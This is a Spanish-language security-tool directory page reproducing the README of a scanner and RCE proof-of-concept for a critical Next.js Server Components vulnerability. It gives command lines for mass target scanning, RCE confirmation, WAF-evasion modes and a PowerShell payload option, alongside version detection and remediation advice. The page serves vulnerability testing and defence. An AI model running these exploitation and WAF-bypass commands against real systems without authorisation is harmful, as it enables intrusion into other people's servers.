Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC2-CVE-2025-55182 — Escáner de vulnerabilidades multimodo para Next.js RCE (CVE-2025-66478/55182) con detección segura de canal lateral, prueba de concepto de RCE, técnicas de evasión de WAF y escaneo de dependencias de proyectos locales. | Kitploit
Herramientas/GitHubGitHub/iamblacksolo2-bugbounty/poc2-cve-2025-55182
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de Penetración
GitHubiamblacksolo2-bugbounty/poc2-cve-2025-55182

POC2-CVE-2025-55182

Escáner de vulnerabilidades multimodo para Next.js RCE (CVE-2025-66478/55182) con detección segura de canal lateral, prueba de concepto de RCE, técnicas de evasión de WAF y escaneo de dependencias de proyectos locales.

Ver Repositorio
5hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell Ultimate - Escáner CVE-2025-66478

CVE-2025-66478 CVE-2025-55182 CVSS 10.0 Python 3.7+ MIT License

El escáner más completo para la vulnerabilidad de Ejecución Remota de Código en Next.js RSC

root@kitploit:~
╔════════════════════════════════════════════════════════════════════════╗
║     ____                 _   ___  ____  _          _ _                 ║
║    |  _ \ ___  __ _  ___| |_|__ \/ ___|| |__   ___| | |                ║
║    | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | |                ║
║    |  _ <  __/ (_| | (__| |_ / /_ ___) | | | |  __/ | |                ║
║    |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_|                ║
║                                                                        ║
║            React2Shell Ultimate CVE-2025-66478 Escáner v1.0.0          ║
║     Vulnerabilidad de Ejecución Remota de Código en Next.js RSC        ║
╠════════════════════════════════════════════════════════════════════════╣
║                                                                        ║
║                                                                        ║
╠════════════════════════════════════════════════════════════════════════╣
║  Modos: --safe (canal lateral) | --rce (PoC) | --version | --local    ║
║  Bypass de WAF: --waf-bypass | --vercel-bypass | --unicode            ║
╚════════════════════════════════════════════════════════════════════════╝

🚨 Resumen de la Vulnerabilidad

CVE-2025-66478 (también conocido como CVE-2025-55182) es una vulnerabilidad CRÍTICA (CVSS 10.0) de Ejecución Remota de Código que afecta a aplicaciones Next.js que usan React Server Components (RSC).

Versiones Afectadas

Rango de VersionesEstado
Next.js 15.0.0 - 15.0.4⚠️ Vulnerable
Next.js 15.1.0 - 15.1.8⚠️ Vulnerable
Next.js 15.2.0 - 15.2.5⚠️ Vulnerable
Next.js 15.3.0 - 15.3.5⚠️ Vulnerable
Next.js 15.4.0 - 15.4.7⚠️ Vulnerable
Next.js 15.5.0 - 15.5.6⚠️ Vulnerable
Next.js 16.0.0 - 16.0.6⚠️ Vulnerable
Next.js 14.3.0-canary.77+⚠️ Vulnerable
Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+✅ Parcheada
Next.js 16.0.7+✅ Parcheada
Next.js 13.x, 14.x estable✅ No Afectada

✨ Características

Esta herramienta combina las mejores características de múltiples escáneres CVE-2025-66478:

CaracterísticaDescripción
🔍 Detección MultimodoCanal lateral seguro, PoC RCE, solo versión, escaneo local
🛡️ Técnicas de Bypass de WAFRelleno de datos basura, codificación Unicode, bypass específico de Vercel
📁 Escaneo de Proyectos LocalesEscanear package.json, lockfiles para dependencias vulnerables
⚡ Alto RendimientoEscaneo multihebra con concurrencia configurable
📊 Múltiples Formatos de SalidaConsola, JSON, exportación a archivo
🎯 Detección Precisa de VersionesCabeceras HTTP, huella digital RSC, conocimiento de versiones parcheadas

🚀 Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate

# Instalar dependencias
pip install -r requirements.txt

# O instalar manualmente
pip install requests tqdm

📖 Uso

Escaneo Básico

root@kitploit:~
# Solo detección de versión (más rápido, sin explotación)
python3 react2shell-ultimate.py -u https://target.com --version

# Detección segura por canal lateral (sin ejecución de código)
python3 react2shell-ultimate.py -u https://target.com --safe

# Prueba de concepto RCE (ejecuta cálculo inofensivo: 41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce

# Escaneo completo con todos los intentos de bypass
python3 react2shell-ultimate.py -u https://target.com --comprehensive

Escaneo Masivo

root@kitploit:~
# Escanear múltiples objetivos desde un archivo
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json

# Modo silencioso - solo mostrar hosts vulnerables
python3 react2shell-ultimate.py -l targets.txt -q

# Salida JSON a stdout
python3 react2shell-ultimate.py -l targets.txt --json

Escaneo de Proyectos Locales

root@kitploit:~
# Escanear directorio actual
python3 react2shell-ultimate.py --local .

# Escanear ruta de proyecto específica
python3 react2shell-ultimate.py --local /path/to/nextjs/projects

Técnicas de Bypass de WAF

root@kitploit:~
# Bypass con datos basura (añade 128KB de relleno para evadir inspección de contenido)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass

# Tamaño personalizado de datos basura
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256

# Bypass con codificación Unicode
python3 react2shell-ultimate.py -u https://target.com --rce --unicode

# Bypass específico de WAF de Vercel
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass

# Objetivo Windows (payload PowerShell)
python3 react2shell-ultimate.py -u https://target.com --rce --windows

Opciones Avanzadas

root@kitploit:~
# Con proxy
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080

# Cabeceras personalizadas
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"

# Aumentar tiempo de espera
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30

# Salida detallada
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v

📋 Opciones de Línea de Comandos

OpciónDescripción
-u, --urlURL única para escanear
-l, --listArchivo que contiene URLs (una por línea)
--localEscanear directorio de proyecto local
--safeDetección segura por canal lateral (sin RCE)
--rceModo de prueba de concepto RCE
--versionSolo detección de versión
--comprehensiveEscaneo completo con todas las técnicas
--waf-bypassAñadir datos basura para bypass de WAF
--waf-bypass-sizeTamaño de datos basura en KB (por defecto: 128)
--unicodeCodificación Unicode para bypass de WAF
--vercel-bypassBypass específico de WAF de Vercel
--windowsUsar payload de PowerShell para Windows
-t, --threadsHilos concurrentes (por defecto: 10)
--timeoutTiempo de espera de solicitud en segundos (por defecto: 10)
-k, --insecureDeshabilitar verificación SSL
--proxyURL del proxy (http://host:port)
-H, --headerCabecera personalizada (repetible)
-o, --outputArchivo de salida (JSON)
--all-resultsGuardar todos los resultados, no solo los vulnerables
-v, --verboseSalida detallada
-q, --quietSolo mostrar hosts vulnerables
--jsonSalida JSON a stdout
--no-color

🔬 Métodos de Detección

1. Detección Segura por Canal Lateral (--safe)

Provoca un patrón de respuesta de error específico sin ejecutar ningún código. Identifica implementaciones RSC vulnerables a través del comportamiento de manejo de errores.

2. Prueba de Concepto RCE (--rce)

Ejecuta un cálculo matemático inofensivo (echo $((41*271)) = 11111) para confirmar la capacidad de RCE. El resultado aparece en la cabecera X-Action-Redirect.

3. Detección de Versión (--version)

  • Comprueba la cabecera X-Powered-By para la versión de Next.js
  • Analiza la cabecera Vary en busca de indicadores RSC
  • Sonda endpoints RSC para respuestas text/x-component
  • Escanea el código fuente de la página para detectar huellas de Next.js

4. Escaneo Local (--local)

Escanea directorios de proyecto para:

  • package.json - Declaración de dependencia directa
  • package-lock.json - Archivo de bloqueo de NPM
  • yarn.lock - Archivo de bloqueo de Yarn
  • pnpm-lock.yaml - Archivo de bloqueo de PNPM
  • bun.lockb - Archivo de bloqueo de Bun

📊 Ejemplos de Salida

Salida en Consola

root@kitploit:~
[VULNERABLE] https://target.com
    Versión: 15.3.1 | Estado: 200 | Método: rce_poc
    Bypass de WAF: ÉXITO

[NO VULNERABLE] https://safe-target.com
    Versión: 15.5.7 | Estado: 200 | Método: http_headers

[BLOQUEADO POR WAF] https://protected.com
    Versión: 15.2.0 | Estado: 403 | Método: rce_poc
    WAF Detectado: Exploit bloqueado

Salida JSON

root@kitploit:~
{
  "tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
  "version": "1.0.0",
  "cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
  "scan_time": "2025-12-06T12:00:00Z",
  "total_results": 1,
  "results": [
    {
      "url": "https://target.com",
      "vulnerable": true,
      "version": "15.3.1",
      "status_code": 200,
      "detection_method": "rce_poc",
      "waf_detected": false,
      "waf_bypassed": false
    }
  ]
}

🛡️ Remediación

Si encuentra aplicaciones vulnerables:

  1. Actualice inmediatamente a las versiones parcheadas:

    • Next.js 15.x → Actualizar a 15.5.7+ (o el parche de su versión menor)
    • Next.js 16.x → Actualizar a 16.0.7+
  2. Mitigaciones temporales:

    • Use Edge Runtime en lugar de Node.js runtime
    • Deshabilite Server Actions si no son necesarias
    • Implemente detrás de un WAF con detección de payload RSC
  3. Monitoree intentos de explotación en los registros

📚 Referencias

  • Aviso de Seguridad de Next.js - CVE-2025-66478
  • Assetnote Research - React2Shell
  • NVD - CVE-2025-66478

⚠️ Aviso Legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos.

  • Solo escanee sistemas para los que tenga permiso explícito de prueba
  • El modo PoC RCE ejecuta código en los sistemas objetivo (cálculo inofensivo)
  • El acceso no autorizado a sistemas informáticos es ilegal
  • El autor no se hace responsable del mal uso de esta herramienta

📄 Licencia

Licencia MIT - Consulte el archivo LICENSE para más detalles.


⭐ Dale una estrella a este repositorio si te resulta útil! ⭐

Descargar herramienta
Deshabilitar salida con colores